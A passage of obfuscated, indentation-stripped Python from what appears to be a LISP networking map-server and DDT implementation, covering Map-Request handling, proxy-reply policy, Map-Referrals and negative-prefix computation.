lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( IIiII11i1 . print_address ( ) , iI1Ii1 . print_address ( ) ) )
if 57 - 57: Oo0Ooo * iIii1I11I1II1 - OoOoOO00 % iII111i % I1ii11iIi11i + Ii1I
if 82 - 82: IiII * Oo0Ooo - iIii1I11I1II1 - i11iIiiIii
O0oIiI = bold ( "passed" , False ) if II1i1iI else bold ( "failed" , False )
lprint ( "Required signature verification {}" . format ( O0oIiI ) )
if 85 - 85: OoooooooOO
if 37 - 37: OoooooooOO + O0 + I1ii11iIi11i + IiII * iII111i
if 15 - 15: i11iIiiIii / Oo0Ooo - OOooOOo . IiII
if 11 - 11: OOooOOo / i1IIi % Oo0Ooo
if 65 - 65: OOooOOo % I1ii11iIi11i
if 25 - 25: o0oOOo0O0Ooo - I1Ii111 * I1ii11iIi11i + OoooooooOO
if ( II1i1iI and O0oiiii1i1i11I . registered == False ) :
lprint ( "Site '{}' with EID-prefix {} is not registered for EID {}" . format ( O0oooOO0O , green ( IiI1ii1 , False ) , green ( iiI1Ii1I , False ) ) )
if 93 - 93: OoOoOO00 % I1ii11iIi11i * I11i
if 34 - 34: I11i - oO0o + I11i * OoooooooOO * I11i
if 73 - 73: OOooOOo * iII111i * OoO0O00
if 11 - 11: I1Ii111 * II111iiii
if 3 - 3: Oo0Ooo * OOooOOo
if 13 - 13: I1Ii111 + i11iIiiIii / OOooOOo
if ( O0oiiii1i1i11I . accept_more_specifics == False ) :
I111o0oooO00o0 = O0oiiii1i1i11I . eid
oOoooOOO0o0 = O0oiiii1i1i11I . group
if 98 - 98: I1IiiI * Oo0Ooo
if 9 - 9: O0 / i11iIiiIii . iIii1I11I1II1 . IiII
if 14 - 14: OoOoOO00 . OOooOOo - Oo0Ooo + I1Ii111 % ooOoO0o
if 95 - 95: OoO0O00 * II111iiii + i1IIi
if 22 - 22: Ii1I / ooOoO0o % I11i + OoO0O00 . ooOoO0o
oo0OOoOO0 = 1
if ( O0oiiii1i1i11I . force_ttl != None ) :
oo0OOoOO0 = O0oiiii1i1i11I . force_ttl | 0x80000000
if 61 - 61: O0 - iIii1I11I1II1 * Oo0Ooo . Ii1I + O0
if 20 - 20: ooOoO0o / ooOoO0o - Ii1I - ooOoO0o
if 93 - 93: O0 * OoOoOO00 * iIii1I11I1II1
if 3 - 3: I1ii11iIi11i - O0
if 46 - 46: iII111i
lisp_send_negative_map_reply ( lisp_sockets , I111o0oooO00o0 , oOoooOOO0o0 , OO00OO , O00o00O0OO0 ,
mr_sport , oo0OOoOO0 , oOo0 , OooOooOO0000 )
if 99 - 99: oO0o
return ( [ I111o0oooO00o0 , oOoooOOO0o0 , LISP_DDT_ACTION_MS_NOT_REG ] )
if 85 - 85: I1Ii111 * iIii1I11I1II1 . OoOoOO00
if 20 - 20: I11i * O0 - OoooooooOO * OOooOOo % oO0o * iII111i
if 70 - 70: I11i + O0 . i11iIiiIii . OOooOOo
if 48 - 48: iIii1I11I1II1 * Ii1I - OoooooooOO / oO0o - OoO0O00 / i11iIiiIii
if 24 - 24: I1IiiI
O00oO0ooo = False
OOIIi11iiiIIIII = ""
oO0OOoOo0O = False
if ( O0oiiii1i1i11I . force_nat_proxy_reply ) :
OOIIi11iiiIIIII = ", nat-forced"
O00oO0ooo = True
oO0OOoOo0O = True
elif ( O0oiiii1i1i11I . force_proxy_reply ) :
OOIIi11iiiIIIII = ", forced"
oO0OOoOo0O = True
elif ( O0oiiii1i1i11I . proxy_reply_requested ) :
OOIIi11iiiIIIII = ", requested"
oO0OOoOo0O = True
elif ( map_request . pitr_bit and O0oiiii1i1i11I . pitr_proxy_reply_drop ) :
OOIIi11iiiIIIII = ", drop-to-pitr"
Ii1II1I = LISP_DROP_ACTION
elif ( O0oiiii1i1i11I . proxy_reply_action != "" ) :
Ii1II1I = O0oiiii1i1i11I . proxy_reply_action
OOIIi11iiiIIIII = ", forced, action {}" . format ( Ii1II1I )
Ii1II1I = LISP_DROP_ACTION if ( Ii1II1I == "drop" ) else LISP_NATIVE_FORWARD_ACTION
if 91 - 91: OOooOOo - OoooooooOO . OoO0O00
if 34 - 34: Ii1I . I1IiiI . i1IIi * I1ii11iIi11i
if 77 - 77: ooOoO0o . II111iiii
if 41 - 41: IiII
if 27 - 27: IiII / IiII
if 91 - 91: Ii1I
if 93 - 93: OoO0O00 * OoO0O00 * I1ii11iIi11i * OoO0O00 * o0oOOo0O0Ooo
O0OOO0oO0OO0 = False
iiII1iI = None
if ( oO0OOoOo0O and lisp_policies . has_key ( O0oiiii1i1i11I . policy ) ) :
iIiiI11II11 = lisp_policies [ O0oiiii1i1i11I . policy ]
if ( iIiiI11II11 . match_policy_map_request ( map_request , mr_source ) ) : iiII1iI = iIiiI11II11
if 8 - 8: I1ii11iIi11i
if ( iiII1iI ) :
O00OOOo0Oo0 = bold ( "matched" , False )
lprint ( "Map-Request {} policy '{}', set-action '{}'" . format ( O00OOOo0Oo0 ,
iIiiI11II11 . policy_name , iIiiI11II11 . set_action ) )
else :
O00OOOo0Oo0 = bold ( "no match" , False )
lprint ( "Map-Request {} for policy '{}', implied drop" . format ( O00OOOo0Oo0 ,
iIiiI11II11 . policy_name ) )
O0OOO0oO0OO0 = True
if 88 - 88: I11i
if 36 - 36: iIii1I11I1II1 - ooOoO0o * OoO0O00 * OoO0O00 . II111iiii
if 49 - 49: O0 + OoO0O00 - I1ii11iIi11i + ooOoO0o
if ( OOIIi11iiiIIIII != "" ) :
lprint ( "Proxy-replying for EID {}, found site '{}' EID-prefix {}{}" . format ( green ( iiI1Ii1I , False ) , O0oooOO0O , green ( IiI1ii1 , False ) ,
# iIii1I11I1II1 * ooOoO0o . ooOoO0o % I1Ii111 % ooOoO0o . ooOoO0o
OOIIi11iiiIIIII ) )
if 78 - 78: Oo0Ooo
iio0OOoO0 = O0oiiii1i1i11I . registered_rlocs
oo0OOoOO0 = 1440
if ( O00oO0ooo ) :
if ( O0oiiii1i1i11I . site_id != 0 ) :
Oooo0OOO0oo0o = map_request . source_eid
iio0OOoO0 = lisp_get_private_rloc_set ( O0oiiii1i1i11I , Oooo0OOO0oo0o , oOoooOOO0o0 )
if 78 - 78: o0oOOo0O0Ooo . i11iIiiIii % IiII
if ( iio0OOoO0 == O0oiiii1i1i11I . registered_rlocs ) :
OOo0I111I = ( O0oiiii1i1i11I . group . is_null ( ) == False )
i11i1i11ii11I = lisp_get_partial_rloc_set ( iio0OOoO0 , OOo0oOoOo0ooO , OOo0I111I )
if ( i11i1i11ii11I != iio0OOoO0 ) :
oo0OOoOO0 = 15
iio0OOoO0 = i11i1i11ii11I
if 66 - 66: o0oOOo0O0Ooo
if 44 - 44: IiII / IiII - iII111i * i11iIiiIii % i11iIiiIii + i11iIiiIii
if 50 - 50: II111iiii . IiII / O0 . I1ii11iIi11i / OOooOOo % ooOoO0o
if 90 - 90: OoO0O00 + OOooOOo
if 64 - 64: o0oOOo0O0Ooo + OoO0O00 % I1Ii111 * I11i * iII111i % I11i
if 26 - 26: OoO0O00 - II111iiii - o0oOOo0O0Ooo
if 50 - 50: OoooooooOO
if 51 - 51: II111iiii - oO0o % OoooooooOO - II111iiii / O0 - OoooooooOO
if ( O0oiiii1i1i11I . force_ttl != None ) :
oo0OOoOO0 = O0oiiii1i1i11I . force_ttl | 0x80000000
if 21 - 21: iII111i * o0oOOo0O0Ooo
if 85 - 85: I1ii11iIi11i . OoOoOO00 . i1IIi % OOooOOo * I11i . I1Ii111
if 26 - 26: I1Ii111 + Oo0Ooo + II111iiii % OoOoOO00 % OOooOOo
if 40 - 40: I1ii11iIi11i + i1IIi
if 9 - 9: OOooOOo
if 74 - 74: OoOoOO00 - OOooOOo % OoOoOO00
if ( iiII1iI ) :
if ( iiII1iI . set_record_ttl ) :
oo0OOoOO0 = iiII1iI . set_record_ttl
lprint ( "Policy set-record-ttl to {}" . format ( oo0OOoOO0 ) )
if 82 - 82: I11i % IiII + Oo0Ooo + iIii1I11I1II1 - I11i - I1IiiI
if ( iiII1iI . set_action == "drop" ) :
lprint ( "Policy set-action drop, send negative Map-Reply" )
Ii1II1I = LISP_POLICY_DENIED_ACTION
iio0OOoO0 = [ ]
else :
OooO0ooO0o0OO = iiII1iI . set_policy_map_reply ( )
if ( OooO0ooO0o0OO ) : iio0OOoO0 = [ OooO0ooO0o0OO ]
if 65 - 65: IiII / O0 * II111iiii + oO0o
if 52 - 52: o0oOOo0O0Ooo - OoOoOO00 * II111iiii / OoooooooOO
if 44 - 44: OOooOOo - oO0o + o0oOOo0O0Ooo - i1IIi % o0oOOo0O0Ooo
if ( O0OOO0oO0OO0 ) :
lprint ( "Implied drop action, send negative Map-Reply" )
Ii1II1I = LISP_POLICY_DENIED_ACTION
iio0OOoO0 = [ ]
if 79 - 79: iII111i . iIii1I11I1II1
if 42 - 42: i11iIiiIii / IiII . O0 / OOooOOo . iII111i * i1IIi
II1iiIiii1iI = O0oiiii1i1i11I . echo_nonce_capable
if 83 - 83: iIii1I11I1II1 . II111iiii * Oo0Ooo . I1IiiI - I1IiiI - iIii1I11I1II1
if 29 - 29: Oo0Ooo
if 35 - 35: OoOoOO00 + II111iiii
if 46 - 46: O0 / I1ii11iIi11i + OOooOOo - I1Ii111 + I1IiiI - ooOoO0o
if ( II1i1iI ) :
O0Oo00O = O0oiiii1i1i11I . eid
OoOOo0O = O0oiiii1i1i11I . group
else :
O0Oo00O = I111o0oooO00o0
OoOOo0O = oOoooOOO0o0
Ii1II1I = LISP_AUTH_FAILURE_ACTION
iio0OOoO0 = [ ]
if 5 - 5: oO0o
if 59 - 59: iII111i
if 74 - 74: IiII
if 94 - 94: I11i + OoooooooOO
if 20 - 20: o0oOOo0O0Ooo % o0oOOo0O0Ooo . iIii1I11I1II1 + OoOoOO00 * OoO0O00
if 57 - 57: i11iIiiIii * i11iIiiIii % I1Ii111 - iII111i * O0 - Ii1I
packet = lisp_build_map_reply ( O0Oo00O , OoOOo0O , iio0OOoO0 ,
OO00OO , Ii1II1I , oo0OOoOO0 , False , None , II1iiIiii1iI , False )
if 63 - 63: IiII % OoooooooOO * OoOoOO00 * iIii1I11I1II1 . iII111i % oO0o
if ( OooOooOO0000 ) :
lisp_process_pubsub ( lisp_sockets , packet , O0Oo00O , O00o00O0OO0 ,
mr_sport , OO00OO , oo0OOoOO0 , oOo0 )
else :
lisp_send_map_reply ( lisp_sockets , packet , O00o00O0OO0 , mr_sport )
if 58 - 58: I11i * iII111i + I11i % OoO0O00
if 19 - 19: Oo0Ooo
return ( [ O0oiiii1i1i11I . eid , O0oiiii1i1i11I . group , LISP_DDT_ACTION_MS_ACK ] )
if 43 - 43: oO0o % ooOoO0o
if 36 - 36: I11i / I1IiiI + O0 % II111iiii
if 24 - 24: I1Ii111 / o0oOOo0O0Ooo - OOooOOo / IiII
if 7 - 7: OoooooooOO - i11iIiiIii * i11iIiiIii / oO0o * i1IIi % OoooooooOO
if 6 - 6: I1ii11iIi11i * i11iIiiIii % i11iIiiIii / I1Ii111
i1ii1I = len ( O0oiiii1i1i11I . registered_rlocs )
if ( i1ii1I == 0 ) :
lprint ( "Requested EID {} found site '{}' with EID-prefix {} with " + "no registered RLOCs" . format ( green ( iiI1Ii1I , False ) , O0oooOO0O ,
# oO0o . OoOoOO00
green ( IiI1ii1 , False ) ) )
return ( [ O0oiiii1i1i11I . eid , O0oiiii1i1i11I . group , LISP_DDT_ACTION_MS_ACK ] )
if 10 - 10: I1IiiI / I1Ii111 % IiII . OoOoOO00
if 65 - 65: II111iiii + OoO0O00 + OoO0O00
if 48 - 48: I1ii11iIi11i / iIii1I11I1II1
if 47 - 47: I1Ii111
if 41 - 41: IiII
i1iiIiiiiIi = map_request . target_eid if map_request . source_eid . is_null ( ) else map_request . source_eid
if 26 - 26: I1ii11iIi11i - OoOoOO00 + o0oOOo0O0Ooo * IiII - IiII - iII111i
IiI1I1i1 = map_request . target_eid . hash_address ( i1iiIiiiiIi )
IiI1I1i1 %= i1ii1I
iI1IIiIiIiII = O0oiiii1i1i11I . registered_rlocs [ IiI1I1i1 ]
if 57 - 57: OOooOOo / II111iiii . Ii1I / I1Ii111 . OoooooooOO
if ( iI1IIiIiIiII . rloc . is_null ( ) ) :
lprint ( ( "Suppress forwarding Map-Request for EID {} at site '{}' " + "EID-prefix {}, no RLOC address" ) . format ( green ( iiI1Ii1I , False ) ,
# I11i % IiII
O0oooOO0O , green ( IiI1ii1 , False ) ) )
else :
lprint ( ( "Forwarding Map-Request for EID {} to ETR {} at site '{}' " + "EID-prefix {}" ) . format ( green ( iiI1Ii1I , False ) ,
# O0 / II111iiii . Oo0Ooo / Oo0Ooo * II111iiii
red ( iI1IIiIiIiII . rloc . print_address ( ) , False ) , O0oooOO0O ,
green ( IiI1ii1 , False ) ) )
if 22 - 22: Ii1I
if 81 - 81: iIii1I11I1II1 . ooOoO0o % I11i
if 64 - 64: I1Ii111 . Oo0Ooo * o0oOOo0O0Ooo
if 32 - 32: oO0o . I1Ii111 * I1Ii111
lisp_send_ecm ( lisp_sockets , packet , map_request . source_eid , mr_sport ,
map_request . target_eid , iI1IIiIiIiII . rloc , to_etr = True )
if 32 - 32: I1Ii111 . Ii1I / i1IIi
return ( [ O0oiiii1i1i11I . eid , O0oiiii1i1i11I . group , LISP_DDT_ACTION_MS_ACK ] )
if 2 - 2: OOooOOo * ooOoO0o / I11i + OoO0O00
if 96 - 96: II111iiii * OoO0O00 + I1ii11iIi11i + OoOoOO00 / II111iiii . iII111i
if 64 - 64: iII111i % Oo0Ooo
if 79 - 79: IiII + iII111i / II111iiii . i1IIi + iIii1I11I1II1
if 32 - 32: Ii1I * iII111i
if 52 - 52: I11i
if 100 - 100: Oo0Ooo % Oo0Ooo % I1ii11iIi11i
def lisp_ddt_process_map_request ( lisp_sockets , map_request , ecm_source , port ) :
if 33 - 33: I1Ii111 . I1Ii111 * i1IIi
if 22 - 22: I1ii11iIi11i . II111iiii + iIii1I11I1II1 / OoooooooOO . ooOoO0o
if 13 - 13: II111iiii
if 36 - 36: iII111i - oO0o / Oo0Ooo / O0 . OoO0O00 . i1IIi
I111o0oooO00o0 = map_request . target_eid
oOoooOOO0o0 = map_request . target_group
iiI1Ii1I = lisp_print_eid_tuple ( I111o0oooO00o0 , oOoooOOO0o0 )
OO00OO = map_request . nonce
Ii1II1I = LISP_DDT_ACTION_NULL
if 19 - 19: O0 . OoooooooOO % iIii1I11I1II1 - Ii1I . Ii1I + I1IiiI
if 98 - 98: oO0o . Oo0Ooo
if 9 - 9: I1Ii111 % IiII - i11iIiiIii - OOooOOo % iII111i % OoooooooOO
if 6 - 6: i1IIi - II111iiii * OoOoOO00 + oO0o
if 6 - 6: I1IiiI - ooOoO0o + I1IiiI + OoO0O00 - i11iIiiIii % ooOoO0o
oo0O0O = None
if ( lisp_i_am_ms ) :
O0oiiii1i1i11I = lisp_site_eid_lookup ( I111o0oooO00o0 , oOoooOOO0o0 , False )
if ( O0oiiii1i1i11I == None ) : return
if 34 - 34: OoO0O00 % I1ii11iIi11i
if ( O0oiiii1i1i11I . registered ) :
Ii1II1I = LISP_DDT_ACTION_MS_ACK
oo0OOoOO0 = 1440
else :
I111o0oooO00o0 , oOoooOOO0o0 , Ii1II1I = lisp_ms_compute_neg_prefix ( I111o0oooO00o0 , oOoooOOO0o0 )
Ii1II1I = LISP_DDT_ACTION_MS_NOT_REG
oo0OOoOO0 = 1
if 80 - 80: IiII - I1Ii111 / iIii1I11I1II1
else :
oo0O0O = lisp_ddt_cache_lookup ( I111o0oooO00o0 , oOoooOOO0o0 , False )
if ( oo0O0O == None ) :
Ii1II1I = LISP_DDT_ACTION_NOT_AUTH
oo0OOoOO0 = 0
lprint ( "DDT delegation entry not found for EID {}" . format ( green ( iiI1Ii1I , False ) ) )
if 45 - 45: oO0o + iII111i / o0oOOo0O0Ooo + I11i % OoOoOO00
elif ( oo0O0O . is_auth_prefix ( ) ) :
if 6 - 6: OoooooooOO + i1IIi % IiII - OoO0O00 * iIii1I11I1II1
if 36 - 36: I11i / o0oOOo0O0Ooo + IiII * o0oOOo0O0Ooo + Ii1I - I11i
if 70 - 70: oO0o * ooOoO0o / ooOoO0o - Ii1I * Ii1I % OOooOOo
if 91 - 91: OoO0O00 - OoO0O00 % O0
Ii1II1I = LISP_DDT_ACTION_DELEGATION_HOLE
oo0OOoOO0 = 15
o0oO0OOoOoOO = oo0O0O . print_eid_tuple ( )
lprint ( ( "DDT delegation entry not found but auth-prefix {} " + "found for EID {}" ) . format ( o0oO0OOoOoOO ,
# Ii1I - ooOoO0o / Ii1I - oO0o - iII111i
green ( iiI1Ii1I , False ) ) )
if 10 - 10: I1Ii111 . Oo0Ooo . Ii1I . i11iIiiIii / OoooooooOO
if ( oOoooOOO0o0 . is_null ( ) ) :
I111o0oooO00o0 = lisp_ddt_compute_neg_prefix ( I111o0oooO00o0 , oo0O0O ,
lisp_ddt_cache )
else :
oOoooOOO0o0 = lisp_ddt_compute_neg_prefix ( oOoooOOO0o0 , oo0O0O ,
lisp_ddt_cache )
I111o0oooO00o0 = lisp_ddt_compute_neg_prefix ( I111o0oooO00o0 , oo0O0O ,
oo0O0O . source_cache )
if 58 - 58: I1Ii111 / iII111i / oO0o
oo0O0O = None
else :
o0oO0OOoOoOO = oo0O0O . print_eid_tuple ( )
lprint ( "DDT delegation entry {} found for EID {}" . format ( o0oO0OOoOoOO , green ( iiI1Ii1I , False ) ) )
if 69 - 69: i11iIiiIii / O0 - OoooooooOO + I1ii11iIi11i . OoO0O00
oo0OOoOO0 = 1440
if 19 - 19: I1IiiI / iII111i . OOooOOo / oO0o + I1ii11iIi11i + OOooOOo
if 1 - 1: iIii1I11I1II1
if 59 - 59: ooOoO0o % I1IiiI + i1IIi * I1Ii111 % o0oOOo0O0Ooo * II111iiii
if 22 - 22: OoOoOO00 * O0 + OoOoOO00 / iIii1I11I1II1 + oO0o + IiII
if 69 - 69: iIii1I11I1II1 . I1Ii111 * iII111i
if 6 - 6: I11i - IiII - I11i - II111iiii
ii1i1II = lisp_build_map_referral ( I111o0oooO00o0 , oOoooOOO0o0 , oo0O0O , Ii1II1I , oo0OOoOO0 , OO00OO )
OO00OO = map_request . nonce >> 32
if ( map_request . nonce != 0 and OO00OO != 0xdfdf0e1d ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , ii1i1II , ecm_source , port )
return
if 72 - 72: i1IIi / OOooOOo . Oo0Ooo . oO0o
if 72 - 72: o0oOOo0O0Ooo % iIii1I11I1II1
if 74 - 74: Oo0Ooo % OOooOOo + i11iIiiIii
if 17 - 17: OoOoOO00 . I1IiiI
if 30 - 30: i1IIi * OoOoOO00 * I11i . O0
if 45 - 45: iII111i
if 99 - 99: o0oOOo0O0Ooo % ooOoO0o % i11iIiiIii
if 32 - 32: IiII - Ii1I
if 44 - 44: OoooooooOO . oO0o
if 30 - 30: I1Ii111 % IiII / II111iiii
if 68 - 68: oO0o / O0 / OOooOOo
if 3 - 3: o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 17 - 17: OoO0O00 * i1IIi
def lisp_find_negative_mask_len ( eid , entry_prefix , neg_prefix ) :
iI1I11I = eid . hash_address ( entry_prefix )
IIIi1iIiiI1 = eid . addr_length ( ) * 8
Ooo0o00 = 0
if 25 - 25: I1ii11iIi11i - OOooOOo . iIii1I11I1II1 * O0 + OoooooooOO
if 83 - 83: OoooooooOO + Oo0Ooo
if 4 - 4: Oo0Ooo - i11iIiiIii / O0 / I11i + ooOoO0o / iII111i
if 72 - 72: II111iiii % iII111i + OoO0O00
for Ooo0o00 in range ( IIIi1iIiiI1 ) :
IiIi11 = 1 << ( IIIi1iIiiI1 - Ooo0o00 - 1 )
if ( iI1I11I & IiIi11 ) : break
if 83 - 83: i11iIiiIii - o0oOOo0O0Ooo - O0
if 25 - 25: I1ii11iIi11i - O0 * iII111i % I1IiiI % Ii1I + OoO0O00
if ( Ooo0o00 > neg_prefix . mask_len ) : neg_prefix . mask_len = Ooo0o00
return
if 44 - 44: I1IiiI - Oo0Ooo / OoOoOO00 . Ii1I - I1IiiI + O0
if 90 - 90: Ii1I + OoooooooOO . i11iIiiIii / Oo0Ooo % OoOoOO00 / IiII
if 45 - 45: OoooooooOO / oO0o . I1ii11iIi11i + OOooOOo
if 54 - 54: Ii1I - o0oOOo0O0Ooo + OoOoOO00 / OoooooooOO
if 61 - 61: I11i / IiII % OoooooooOO - i11iIiiIii * i1IIi % o0oOOo0O0Ooo
if 67 - 67: o0oOOo0O0Ooo - Ii1I
if 29 - 29: OoOoOO00 . I1ii11iIi11i
if 24 - 24: OOooOOo + i1IIi . I11i . OoOoOO00 + OoooooooOO
if 98 - 98: ooOoO0o + i1IIi / I1IiiI
if 1 - 1: IiII . OoooooooOO + II111iiii
def lisp_neg_prefix_walk ( entry , parms ) :
I111o0oooO00o0 , iiIi11i1ii1I , iiiI1i = parms
if 91 - 91: II111iiii / iIii1I11I1II1 / OoOoOO00 . II111iiii
if ( iiIi11i1ii1I == None ) :
if ( entry . eid . instance_id != I111o0oooO00o0 . instance_id ) :
return ( [ True , parms ] )
if 58 - 58: OoOoOO00 - II111iiii
if ( entry . eid . afi != I111o0oooO00o0 . afi ) : return ( [ True , parms ] )
else :
if ( entry . eid . is_more_specific ( iiIi11i1ii1I ) == False ) :
return ( [ True , parms ] )
if 77 - 77: I1ii11iIi11i
if 72 - 72: I1IiiI - i1IIi
if 11 - 11: iIii1I11I1II1 . OoO0O00 * Ii1I
if 65 - 65: Oo0Ooo / OoooooooOO
if 60 - 60: II111iiii + I1IiiI % oO0o - o0oOOo0O0Ooo
if 50 - 50: iIii1I11I1II1 - i11iIiiIii / iII111i + ooOoO0o / OOooOOo
lisp_find_negative_mask_len ( I111o0oooO00o0 , entry . eid , iiiI1i )
return ( [ True , parms ] )
if 80 - 80: IiII / OoooooooOO
if 69 - 69: OoOoOO00 + IiII
if 18 - 18: O0 / I11i
if 10 - 10: I1Ii111 * i1IIi
if 48 - 48: Oo0Ooo % i1IIi / iII111i . O0
if 27 - 27: I11i + iIii1I11I1II1 - i11iIiiIii
if 81 - 81: I11i + oO0o * iIii1I11I1II1 * IiII
if 7 - 7: I11i - I1IiiI . iII111i + O0 / iIii1I11I1II1 - I1Ii111
def lisp_ddt_compute_neg_prefix ( eid , ddt_entry , cache ) :
if 32 - 32: ooOoO0o
if 9 - 9: I1Ii111
if 77 - 77: OoooooooOO * I1Ii111
if 63 - 63: IiII * oO0o * iIii1I11I1II1
if ( eid . is_binary ( ) == False ) : return ( eid )
if 18 - 18: II111iiii * o0oOOo0O0Ooo % i11iIiiIii . OoOoOO00
iiiI1i = lisp_address ( eid . afi , "" , 0 , 0 )
iiiI1i . copy_address ( eid )
iiiI1i . mask_len = 0
if 40 - 40: oO0o - o0oOOo0O0Ooo * II111iiii
iioOoOo0 = ddt_entry . print_eid_tuple ( )
iiIi11i1ii1I = ddt_entry . eid
if 92 - 92: ooOoO0o
if 58 - 58: iII111i % I11i
if 71 - 71: I1IiiI + OoO0O00 + IiII * I11i
if 61 - 61: I1IiiI / OoOoOO00
if 58 - 58: o0oOOo0O0Ooo - Oo0Ooo % OoOoOO00 + I11i
eid , iiIi11i1ii1I , iiiI1i = cache . walk_cache ( lisp_neg_prefix_walk ,
( eid , iiIi11i1ii1I , iiiI1i ) )
if 10 - 10: II111iiii / iIii1I11I1II1 % i11iIiiIii
if 29 - 29: ooOoO0o - iII111i + IiII % Ii1I - oO0o - ooOoO0o
if 43 - 43: oO0o
if 22 - 22: I1Ii111 + i11iIiiIii
iiiI1i . mask_address ( iiiI1i . mask_len )
if 49 - 49: O0 % II111iiii . OOooOOo + iII111i + iIii1I11I1II1 / i11iIiiIii
lprint ( ( "Least specific prefix computed from ddt-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# I1IiiI * o0oOOo0O0Ooo / oO0o * OoO0O00 / i1IIi
iioOoOo0 , iiiI1i . print_prefix ( ) ) )
return ( iiiI1i )
if 16 - 16: Ii1I / Ii1I
if 95 - 95: I11i % OoO0O00
if 69 - 69: OoOoOO00 % IiII / II111iiii
if 82 - 82: I1Ii111 + O0 . I1IiiI / I1ii11iIi11i % II111iiii
if 46 - 46: O0 - I1IiiI + OoooooooOO / OoOoOO00
if 76 - 76: I1ii11iIi11i - ooOoO0o % OoooooooOO / Oo0Ooo % IiII / ooOoO0o
if 57 - 57: O0
if 23 - 23: OoO0O00 / II111iiii . I1ii11iIi11i . O0
def lisp_ms_compute_neg_prefix ( eid , group ) :
iiiI1i = lisp_address ( eid . afi , "" , 0 , 0 )
iiiI1i . copy_address ( eid )
iiiI1i . mask_len = 0
ii1i1I1i = lisp_address ( group . afi , "" , 0 , 0 )
ii1i1I1i . copy_address ( group )
ii1i1I1i . mask_len = 0
iiIi11i1ii1I = None
if 95 - 95: i1IIi + II111iiii . iIii1I11I1II1 . OoooooooOO + o0oOOo0O0Ooo / iIii1I11I1II1
if 40 - 40: OoO0O00 / O0
if 60 - 60: iIii1I11I1II1 / Oo0Ooo / oO0o + iII111i
if 66 - 66: iIii1I11I1II1 . O0 * IiII . ooOoO0o + i1IIi
if 83 - 83: o0oOOo0O0Ooo / II111iiii + I1IiiI - iII111i + OoO0O00
if ( group . is_null ( ) ) :
oo0O0O = lisp_ddt_cache . lookup_cache ( eid , False )
if ( oo0O0O == None ) :
iiiI1i . mask_len = iiiI1i . host_mask_len ( )
ii1i1I1i . mask_len = ii1i1I1i . host_mask_len ( )
return ( [ iiiI1i , ii1i1I1i , LISP_DDT_ACTION_NOT_AUTH ] )
if 67 - 67: I1Ii111 - OoOoOO00 . i11iIiiIii - I1Ii111 . i11iIiiIii
i1I11I1I1I = lisp_sites_by_eid
if ( oo0O0O . is_auth_prefix ( ) ) : iiIi11i1ii1I = oo0O0O . eid
else :
oo0O0O = lisp_ddt_cache . lookup_cache ( group , False )
if ( oo0O0O == None ) :
iiiI1i . mask_len = iiiI1i . host_mask_len ( )
ii1i1I1i . mask_len = ii1i1I1i . host_mask_len ( )
return ( [ iiiI1i , ii1i1I1i , LISP_DDT_ACTION_NOT_AUTH ] )
if 36 - 36: O0 - II111iiii
if ( oo0O0O . is_auth_prefix ( ) ) : iiIi11i1ii1I = oo0O0O . group
if 97 - 97: I1IiiI
group , iiIi11i1ii1I , ii1i1I1i = lisp_sites_by_eid . walk_cache ( lisp_neg_prefix_walk , ( group , iiIi11i1ii1I , ii1i1I1i ) )
if 87 - 87: I11i + iIii1I11I1II1
if 91 - 91: oO0o
ii1i1I1i . mask_address ( ii1i1I1i . mask_len )
if 58 - 58: i11iIiiIii / Ii1I - OoooooooOO
lprint ( ( "Least specific prefix computed from site-cache for " + "group EID {} using auth-prefix {} is {}" ) . format ( group . print_address ( ) , iiIi11i1ii1I . print_prefix ( ) if ( iiIi11i1ii1I != None ) else "'not found'" ,
# IiII - i1IIi
# I1IiiI * I1IiiI - i11iIiiIii % Oo0Ooo . i11iIiiIii
# Ii1I
ii1i1I1i . print_prefix ( ) ) )
if 2 - 2: I1IiiI % I11i * II111iiii
i1I11I1I1I = oo0O0O . source_cache
if 82 - 82: I1Ii111 . OoO0O00 * II111iiii
if 99 - 99: iIii1I11I1II1 / iII111i % i1IIi - II111iiii / OoO0O00
if 33 - 33: OoooooooOO / i1IIi . Ii1I
if 96 - 96: OoOoOO00 / Oo0Ooo . II111iiii / ooOoO0o
if 56 - 56: IiII - ooOoO0o % oO0o / Oo0Ooo * oO0o % O0
Ii1II1I = LISP_DDT_ACTION_DELEGATION_HOLE if ( iiIi11i1ii1I != None ) else LISP_DDT_ACTION_NOT_AUTH
if 71 - 71: iII111i / II111iiii - II111iiii / I1IiiI
if 24 - 24: O0 . I1IiiI + IiII . IiII
if 53 - 53: II111iiii + Ii1I * o0oOOo0O0Ooo
if 47 - 47: Ii1I % OOooOOo . Oo0Ooo
if 94 - 94: Ii1I - iIii1I11I1II1 + I1IiiI - iIii1I11I1II1 . o0oOOo0O0Ooo
if 3 - 3: O0 / I11i + OoOoOO00 % IiII / i11iIiiIii
eid , iiIi11i1ii1I , iiiI1i = i1I11I1I1I . walk_cache ( lisp_neg_prefix_walk ,
( eid , iiIi11i1ii1I , iiiI1i ) )
if 25 - 25: II111iiii / I1ii11iIi11i % iIii1I11I1II1
if 69 - 69: IiII
if 36 - 36: I1IiiI / oO0o
if 72 - 72: i1IIi - I1ii11iIi11i . OOooOOo + I1Ii111 - ooOoO0o
iiiI1i . mask_address ( iiiI1i . mask_len )
if 69 - 69: o0oOOo0O0Ooo * I1IiiI - I11i
lprint ( ( "Least specific prefix computed from site-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# I1IiiI
# O0 % I1ii11iIi11i + I1IiiI - i1IIi . i1IIi * II111iiii
iiIi11i1ii1I . print_prefix ( ) if ( iiIi11i1ii1I != None ) else "'not found'" , iiiI1i . print_prefix ( ) ) )
if 64 - 64: I1IiiI * iIii1I11I1II1 % I1Ii111
if 22 - 22: OoooooooOO + I1Ii111 . o0oOOo0O0Ooo * Oo0Ooo
return ( [ iiiI1i , ii1i1I1i , Ii1II1I ] )
if 61 - 61: iIii1I11I1II1
if 95 - 95: I1ii11iIi11i + IiII * Ii1I - IiII
if 58 - 58: I1ii11iIi11i - oO0o % I11i * O0
if 43 - 43: OoOoOO00 + O0
if 71 - 71: ooOoO0o * I1IiiI / I1ii11iIi11i
if 8 - 8: I1Ii111 / iIii1I11I1II1
if 29 - 29: i11iIiiIii % i1IIi + oO0o . I1ii11iIi11i
if 51 - 51: OOooOOo + o0oOOo0O0Ooo . OOooOOo
